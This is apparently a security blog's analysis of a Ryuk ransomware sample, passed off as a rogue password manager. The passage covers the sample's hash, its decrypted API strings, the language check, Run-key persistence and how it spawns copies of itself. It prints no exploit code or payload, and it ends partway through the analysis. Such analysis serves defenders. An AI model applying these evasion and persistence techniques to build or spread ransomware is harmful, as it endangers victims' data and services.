However, neither of these options works when it comes to cyberattacks. First, cyberattack techniques evolve faster than cats and dogs, so the model must be regularly retrained on new attack patterns. Secondly, ordinary users cannot be involved in the classification of cyber threats because the task is non-trivial.<br />
<br />
In <a href="https://www.nioguard.com/2020/03/ai-and-cybersecurity-part-2.html">the next post</a>, we'll create a basic classifier to detect phishing URLs.</div>
</div>
Alexander Adamov | http://www.blogger.com/profile/10336415028200154730 | noreply@blogger.com | 0 | tag:blogger.com,1999:blog-4482404627541610819.post-4847726978837002951 | 2019-12-09T03:55:00.001-08:00 | 2019-12-09T04:18:16.278-08:00 | Analysis of Ryuk Ransomware<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<img src="https://lh6.googleusercontent.com/u9h-ASzldENTiVYdi6QYucVtjdmra3KNDNCUjvrHAdzRV4e5nG8fp4fH0jgEJvSbP75c8PYXWftBtoo7FfP96HMM6S6e2IvbTd6Os5V73XNHJdr4_1cCDM4LdUH23ZGzcCUaBi9Q" style="font-family: Arial; font-size: 20pt; margin-left: 0px; margin-top: 0px; white-space: pre-wrap;" /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<i style="background-color: white; font-family: "trebuchet ms", trebuchet, verdana, sans-serif; font-size: 13.2px;"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">[Authors: </span><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre;">Viktoria Taran, Alexander Adamov</span><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">]</span></i></div>
<div>
<i style="background-color: white; font-family: "trebuchet ms", trebuchet, verdana, sans-serif; font-size: 13.2px;"><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;"><br /></span></i></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
The Ryuk ransomware, seen for the first time in August 2018, has been successfully used in targeted attacks that encrypt data and ask for a ransom payment ranging from 10 to 50 BTC. The most recent attack was executed against <a href="https://www.bleepingcomputer.com/news/security/dch-hospital-pays-ryuk-ransomware-for-decryption-key/" style="text-decoration-line: none;">DCH hospitals in Alabama</a> on October 1st, 2019. As a result, DCH paid the ransom to recover the data stored on their servers. In this report, we analyze one of the recent versions of Ryuk ransomware, covering the installation process, networking details, and encryption model.<br />
<a name='more'></a><br />
<span style="font-family: "arial"; font-size: 20pt; white-space: pre;"></span></div>
<h3 style="background-color: white; line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; padding: 0pt 0pt 12.75pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre;">Static Analysis</span></h3>
The ransomware file is a PE32 executable for MS Windows, 1232896 bytes in size. The ransomware code is written and compiled in Microsoft Visual C++. According to the compilation timestamp, the binary was created on September 2nd, 2019.<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Company information:<br />
<img height="199" src="https://lh6.googleusercontent.com/E08sqppHtKkwlzss23ykr93J1_F_v_XNVI_6xY4KZGk64clua2rWMNNqyPY99xoEAPCtnBVrWcizv7CUDzMCVwZMSq3bXiuyqlJuKnQzNpKvBvGl7w4fwGe3DweWW9Qgehxt7Qli" style="font-family: arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre;" width="378" /></div>
<b style="font-weight: normal;"><br /></b>
<br />
SHA-256: dd0691992d947366f1b9caf2acc1fec951f761a39ca3863e81bc2c3fb5efd415<br />
<h3 style="background-color: white; line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; padding: 0pt 0pt 12.75pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Obfuscation</span></h3>
Ryuk stores its strings encrypted, among them the API names of its Import Address Table.<br />
<div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 125px; overflow: hidden; width: 630px;"><img height="125" src="https://lh4.googleusercontent.com/GzeQUNdOkuj6SO9O_eOevCFGPCrl9aQO8Ducfc7AEOPhy-i0ZOXJW78B8ArbFpxvJj17rwDbjan-acxqh--Wx4NudTbXT8RNAd51-j7iS_yfCAzhocqwlPh-Ol60CE0UX4H4kF4m" style="margin-left: 0px; margin-top: 0px;" width="630" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
Decrypted strings:<span id="docs-internal-guid-33c87619-7fff-5cc0-fb73-057cf61b2266"><br /></span>
<br />
<div align="left" dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; table-layout: fixed; width: 517.5pt;"><colgroup><col></col><col></col><col></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">LoadLibraryA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">VirtualFree</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">FindFirstFileW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">FindNextFileW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetModuleFileNameA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CreateFileA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Wow64RevertWow64FsRedirection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SetFilePointer</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ShellExecuteW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">VirtualAlloc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CloseHandle</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetWindowsDirectoryW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CreateDirectoryW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CreateFileW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">WriteFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CreateProcessW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetModuleHandleA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CreateProcessA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CopyFileA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetCommandLineW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">FreeLibrary</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GlobalAlloc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetModuleFileNameW</span></div>
</td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CoInitialize</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Wow64DisableWow64FsRedirection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SetFileAttributesA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CopyFileW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">DeleteFileW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ReadFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetFileSize</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetVersionExW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetFileAttributesW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetFileAttributesA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">FindClose</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">WinExec</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Sleep</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ExitProcess</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetCurrentProcess</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetLogicalDrives</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SetFileAttributesW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetStartupInfoW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetTickCount</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetDriveTypeW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">mpr.dll</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">WNetOpenEnumW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">WNetEnumResourceW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">WNetCloseEnum</span></div>
</td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">advapi32.dll</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CryptEncrypt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CryptDecrypt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CryptGenKey</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Cryp&DestroyKey</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CryptExportKey</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CryptImportKey</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CryptDeriveKey</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CryptAcquireContextW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetUserNameA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetUserNameW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">RegOpenKeyExA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">RegOpenKeyExW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">RegQueryValueExA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">RegCloseKey</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">RegDeleteValueW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">RegSetValueExW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ole32.dll</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ShellExecuteA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CoCreateInstance</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Shell32.dll</span></div>
</td></tr>
</tbody></table>
</div>
<h3 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Attack vector</span></h3>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
This version of Ryuk was distributed as a rogue password manager under the filename ‘LithuanianicMercy.exe’. The whole infection chain can be seen in the <a href="https://app.any.run/tasks/5292e31f-a3ab-44ac-84ee-32a26bd7382e/">app.any.run sandbox</a> report.<br />
<h3 style="background-color: white; line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt; padding: 0pt 0pt 12.75pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Installation</span></h3>
</div>
Ryuk reads the language code from the registry key [SYSTEM\CurrentControlSet\Control\Nls\Language]. If the system language is Russian, Belarusian, or Ukrainian, the ransomware exits.<br />
<br />
To persist on the system, Ryuk adds itself to the autorun registry key:<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #fefefe; color: black; font-family: "courier new"; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
After that, it creates an empty ‘1.txt’ file, presumably to check that the current folder is writable.<br />
<br />
<img height="39" src="https://lh4.googleusercontent.com/FB1m6H3gWfZkKi8HzS7IgugpuyKaLEqrW7-S5omvWg7XPR03ETfX2Aoz6bnwjiq79KAZ699oJDyXBzuJQKWei7fr3KjyMx0SQ5BX4nmhwwQKQxTFOfiokWcujs0Qz6aQ4m96WWp5" style="font-family: arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre;" width="284" /></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Ryuk launches numerous copies of itself under random names, passing the string ‘8 LAN’ as a command-line argument.<br />
<br />
Before encryption starts, Ryuk generates a random seven-letter filename with rand(), seeding srand() from GetTickCount(), and copies itself to the newly generated file.<br />
<br />
<img height="215" src="https://lh3.googleusercontent.com/t1G3tgIws14Mdy31SBN9a-JkVOz8Un5f6Zcw_qdzyhHS1jdFeaMxd6Wfc--wX5-XM_uFeNhU3qf5_AwySSq3HCurnTbgKmatO6BqtgJpEF6RR4LU_GE9BOO-bjcz0wh6FNSzM3mX" style="font-family: arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre;" width="438" /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 77px; overflow: hidden; width: 476px;"><img height="77" src="https://lh6.googleusercontent.com/00EPZVBXYmOCCiSZnx-GXxNMGxWCYzfUDyowtIBHicd0yJ7mlDorbzM8k6udFzrkMuv0vbDQauHqynNhUNdjTWzPjj3lXixjFDjR1POnrdvu5wU1VEdybE3zIYMR9mtL3exNQu1N" style="margin-left: 0px; margin-top: 0px;" width="476" /></span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 103px; overflow: hidden; width: 616px;"><img height="103" src="https://lh6.googleusercontent.com/MIiNsoA7G3HpXbrZNV9E5ZZTcq_o4cMHoQB3LRyj2Wh42h4HEo3_newFj9yOolwz93my033lJsIhJENHRWpPmiJDFAGssCqGYrC1wjKgVo2IUgRNSR3XtO6XTfx8l6b2JGCP7yUO" style="margin-left: 0px; margin-top: 0px;" width="616" /></span></span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
After a while Ryuk overloads the system by spawning many such processes, and it does not stop until the system is fully encrypted.<br />
<br />
